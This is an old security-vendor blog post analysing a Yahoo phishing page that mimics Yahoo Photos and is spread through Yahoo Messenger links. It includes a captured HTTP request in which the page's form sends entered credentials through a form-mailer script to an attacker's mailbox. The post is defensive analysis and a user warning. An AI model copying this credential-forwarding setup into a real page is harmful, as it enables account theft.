検索:
ホーム   »     »   New Yahoo Phishing site

New Yahoo Phishing site

  • 投稿日:2006年1月9日
  • 脅威カテゴリ:未分類
  • 執筆:ウイルス解析担当者
0

Just after I finished reading a story of a hacker who hacked a lot of .gov.ph sites, my previous shiftmate popped me a message on a Yahoo Messenger. He asked me if we got new IM Worm samples that uses Yahoo Messenger. I told him none, not even a sample from SOBER.AG anniv links, then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend popped him that link. Below is the snapshot of their correspondence in YM:




And below is the screenshot of the Yahoo Phishing site:


Yahoo Phishing Site

Here we are again, reminding Internet users to be cautious on the links that are visiting. As we can see on the image, the site is pretending to be a Yahoo Photo site, but the URL says it is a Geocities link. Always think twice before giving out any username and passwords on a website.


I sniffed the packet, to find out where the Yahoo account credentials will be sent to:

POST /form/mailto.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-
powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache

Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=
qwerty&passwd=asdf&.save=Sign+InHTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

As we can see, the Yahoo credentials is being sent to
<BLOCKED>.@yahoo.com

No related posts.



  • 個人のお客さま向けオンラインショップ
  • |
  • 法人のお客さま向け直営ストア
  • |
  • 販売パートナー検索
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • 電子公告
  • ご利用条件
  • プライバシーポリシー
  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.